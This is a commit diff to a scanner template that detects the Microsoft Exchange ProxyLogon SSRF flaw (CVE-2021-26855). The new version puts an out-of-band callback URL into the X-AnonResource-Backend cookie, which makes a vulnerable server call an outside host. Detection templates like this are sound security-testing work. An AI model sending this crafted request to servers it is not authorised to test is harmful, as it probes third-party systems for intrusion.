minor updates

cves/2021/CVE-2021-26855.yaml

@@ -6,7 +6,7 @@ info:
   severity: critical
   description: |
       Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
-  tags: cve,cve2021,ssrf,rce,exchange
+  tags: cve,cve2021,ssrf,rce,exchange,oob
   reference: |
       - https://proxylogon.com/#timeline
       - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
@@ -18,19 +18,10 @@ requests:
       - |
         GET /owa/auth/x.js HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
-        Accept-Language: en
-        Connection: close
+        Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
 
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 500
-          - 503
-
       - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
         words:
-          - 'X-Calculatedbetarget: somethingnonexistent'
-        part: header
+          - "http"